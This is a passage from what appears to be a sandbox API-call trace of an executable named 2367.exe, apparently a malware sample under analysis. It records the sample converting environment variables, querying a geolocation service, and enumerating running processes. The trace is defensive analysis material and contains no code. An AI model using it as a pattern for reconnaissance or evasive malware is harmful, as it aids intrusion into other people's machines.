lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0116.931] GetLastError () returned 0x0 [0116.931] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x70) returned 0x31f13f8 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.932] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0xf) returned 0x31ee740 [0116.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x31ee740, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0116.932] GetLastError () returned 0x0 [0116.932] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x74) returned 0x31f1490 [0116.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0116.932] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x16) returned 0x31f13f8 [0116.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x31f13f8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0116.932] GetLastError () returned 0x0 [0116.932] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x78) returned 0x31f1490 [0116.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0116.932] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x2a) returned 0x31eb1f8 [0116.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x31eb1f8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0116.932] GetLastError () returned 0x0 [0116.932] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x7c) returned 0x31f1490 [0116.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0116.932] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x29) returned 0x31eb230 [0116.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x31eb230, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0116.932] GetLastError () returned 0x0 [0116.933] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x80) returned 0x31f1490 [0116.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.933] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x15) returned 0x31f1418 [0116.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x31f1418, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0116.933] GetLastError () returned 0x0 [0116.933] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x84) returned 0x31f1490 [0116.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0116.933] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1e) returned 0x31ef068 [0116.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x31ef068, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0116.933] GetLastError () returned 0x0 [0116.933] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x88) returned 0x31f1490 [0116.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0116.933] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x2a) returned 0x31eb268 [0116.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x31eb268, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0116.933] GetLastError () returned 0x0 [0116.933] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x8c) returned 0x31f1490 [0116.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.934] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x12) returned 0x31f1438 [0116.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x31f1438, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0116.934] GetLastError () returned 0x0 [0116.934] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x90) returned 0x31f1490 [0116.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.934] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x18) returned 0x31f1528 [0116.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x31f1528, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0116.934] GetLastError () returned 0x0 [0116.934] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1490, Size=0x94) returned 0x31f1548 [0116.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0116.934] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x46) returned 0x31e6cf8 [0116.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x31e6cf8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0116.934] GetLastError () returned 0x0 [0116.934] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1548, Size=0x98) returned 0x31f1548 [0116.934] GetLastError () returned 0x0 [0116.935] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.935] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.935] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.935] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x8ec) returned 0x31f15e8 [0116.936] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.936] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x10) returned 0x31ee758 [0116.936] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.936] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.937] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.937] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.938] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0117.038] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x31e5c20 [0117.038] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0123.673] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b5c0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18ddc0 | out: lpBuffer=0x18b5c0*, lpdwNumberOfBytesRead=0x18ddc0*=0x2ba) returned 1 [0123.675] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0123.679] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0123.680] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x20) returned 0x31fc5f0 [0123.680] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2d0) returned 0x62b4048 [0123.680] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b4048 | out: hHeap=0x31d0000) returned 1 [0123.681] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31fc5f0 | out: hHeap=0x31d0000) returned 1 [0123.681] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31e5c20 | out: hHeap=0x31d0000) returned 1 [0123.681] GetCurrentProcess () returned 0xffffffff [0123.681] GetLastError () returned 0x2 [0123.681] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0123.681] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x10) returned 0x32189a8 [0123.681] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x8ec) returned 0x63506e0 [0123.681] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x800) returned 0x3221480 [0123.681] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3221480, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe")) returned 0x2e [0123.681] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0123.681] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x62d1350 [0123.681] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" --Admin IsNotAutoStart IsNotTask" [0123.682] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18dea0 | out: pNumArgs=0x18dea0) returned 0x5dcafe8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0123.682] lstrcpyW (in: lpString1=0x18eb30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0123.682] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0123.682] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0123.683] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" --Admin IsNotAutoStart IsNotTask" [0123.683] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18de3c | out: pNumArgs=0x18de3c) returned 0x5dcafe8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0123.683] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe") returned="2367.exe" [0123.683] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0123.684] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0123.684] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0123.685] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0123.685] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0123.687] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0123.687] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0123.688] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0123.688] EnumProcesses (in: lpidProcess=0x183638, cb=0xa000, lpcbNeeded=0x18de48 | out: lpidProcess=0x183638, lpcbNeeded=0x18de48) returned 1 [0123.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0123.695] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0123.696] CloseHandle (hObject=0x0) returned 0 [0123.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0123.697] CloseHandle (hObject=0x0) returned 0 [0123.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0123.697] CloseHandle (hObject=0x0) returned 0 [0123.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0123.697] CloseHandle (hObject=0x0) returned 0 [0123.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0123.697] CloseHandle (hObject=0x0) returned 0 [0123.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0123.697] CloseHandle (hObject=0x0) returned 0 [0123.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0123.697] CloseHandle (hObject=0x0) returned 0 [0123.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x550 [0123.697] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0123.697] CloseHandle (hObject=0x550) returned 1 [0123.698] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x550 [0123.698] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0123.698] CloseHandle (hObject=0x550) returned 1 [0123.698] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0123.698] CloseHandle (hObject=0x0) returned 0 [0123.698] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0123.698] CloseHandle (hObject=0x0) returned 0 [0123.698] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x550 [0123.698] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0123.698] CloseHandle (hObject=0x550) returned 1 [0123.698] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x550 [0123.699] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0123.699] CloseHandle (hObject=0x550) returned 1 [0123.699] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x550 [0123.699] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.700] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1300000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="macedonia.exe") returned 0xd [0123.700] CloseHandle (hObject=0x550) returned 1 [0123.701] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x550 [0123.701] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.702] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x970000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="tramadol.exe") returned 0xc [0123.702] CloseHandle (hObject=0x550) returned 1 [0123.702] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x550 [0123.702] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.704] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1160000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="reloadmichelle.exe") returned 0x12 [0123.704] CloseHandle (hObject=0x550) returned 1 [0123.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x604) returned 0x550 [0123.704] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.705] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x11d0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="foot grants.exe") returned 0xf [0123.706] CloseHandle (hObject=0x550) returned 1 [0123.706] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x550 [0123.706] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.707] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x10d0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="highland.exe") returned 0xc [0123.708] CloseHandle (hObject=0x550) returned 1 [0123.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x550 [0123.708] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.709] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xd10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="partiallynvk.exe") returned 0x10 [0123.709] CloseHandle (hObject=0x550) returned 1 [0123.709] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c0) returned 0x550 [0123.709] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.711] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xe00000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="latino subject bill.exe") returned 0x17 [0123.712] CloseHandle (hObject=0x550) returned 1 [0123.712] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x114) returned 0x550 [0123.712] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.713] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x13e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="brokers_shed_leslie.exe") returned 0x17 [0123.714] CloseHandle (hObject=0x550) returned 1 [0123.714] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x550 [0123.714] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.715] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1040000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="miss_portable.exe") returned 0x11 [0123.715] CloseHandle (hObject=0x550) returned 1 [0123.715] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x550 [0123.716] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.717] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x1340000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="plans.exe") returned 0x9 [0123.717] CloseHandle (hObject=0x550) returned 1 [0123.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x138) returned 0x550 [0123.717] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.719] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xd10000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="substantial.exe") returned 0xf [0123.719] CloseHandle (hObject=0x550) returned 1 [0123.719] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x550 [0123.719] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.720] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x12e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="design_yards.exe") returned 0x10 [0123.721] CloseHandle (hObject=0x550) returned 1 [0123.721] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x550 [0123.721] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.722] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x960000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="trying.exe") returned 0xa [0123.723] CloseHandle (hObject=0x550) returned 1 [0123.723] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x648) returned 0x550 [0123.723] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.724] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x9e0000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="victorian.exe") returned 0xd [0123.724] CloseHandle (hObject=0x550) returned 1 [0123.724] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x550 [0123.724] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.726] GetModuleBaseNameW (in: hProcess=0x550, hModule=0x390000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="workflow-sheets-madison.exe") returned 0x1b [0123.727] CloseHandle (hObject=0x550) returned 1 [0123.727] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x550 [0123.727] EnumProcessModules (in: hProcess=0x550, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0123.728] GetModuleBaseNameW (in: hProcess=0x550, hModule=0xd70000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="neongarage.exe") returned 0xe [0123.728] CloseHandle (hObject=0x550) 